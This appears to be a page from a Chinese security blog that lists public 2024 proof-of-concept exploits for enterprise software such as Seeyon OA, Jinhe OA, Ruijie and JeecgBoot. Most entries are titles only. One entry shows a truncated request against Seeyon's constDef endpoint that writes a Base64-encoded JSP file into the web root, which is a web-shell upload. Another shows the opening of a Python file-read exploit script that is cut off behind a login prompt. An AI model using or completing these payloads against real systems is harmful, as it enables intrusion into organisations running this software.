2024你懂的 第5页
2024攻防互联网公开POC
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔9个月前
08813
天清汉马vpn任意文件读取_秃兔安全
金和OA_CarCardInfo.aspx_SQL注入漏洞_秃兔安全
锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞_秃兔安全
科荣 AIO 管理系统任意文件读取_秃兔安全

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔9个月前
0878
宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞_秃兔安全
JeecgBoot反射型XSS漏洞_秃兔安全
天玥网络安全审计系统 SQL 注入漏洞_秃兔安全
LiveNVR流媒体服务软件存在未授权访问漏洞_秃兔安全
金和OA任意文件读取漏洞_秃兔安全